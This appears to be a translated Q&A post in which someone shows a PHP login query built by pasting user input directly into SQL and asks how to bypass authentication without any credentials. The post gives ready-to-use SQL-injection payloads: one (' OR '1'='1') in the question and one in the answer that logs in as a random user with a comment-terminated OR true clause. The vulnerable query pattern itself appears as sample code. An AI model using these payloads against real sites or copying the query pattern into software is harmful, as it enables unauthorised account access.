繞過網站認證
[英]Bypassing website authentication
問題描述
我有一個用 php 編寫的非常基本的登錄頁面代碼的一部分,我想在沒有任何登錄的情況下繞過它。
$req="select id from USERS where login='$login' and pwd='$pass'";
$result = mysql_query($req);
如果我有一個用戶的登錄名,例如已經在數據庫中的 login1。 我只需要輸入以下條目即可在不知道他的密碼的情況下登錄; 我們所說的 SQL 注入:
login="login1"
password="' OR '1'='1'"
但是,我不知道如何在沒有任何登錄名或密碼的情況下登錄該頁面。
先感謝您 !
1 個解決方案
解決方案1
0 2014-11-15 00:00:26
它適用於login="' OR true ORDER BY RAND() LIMIT 1 /*"
繞過控制器身份驗證
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.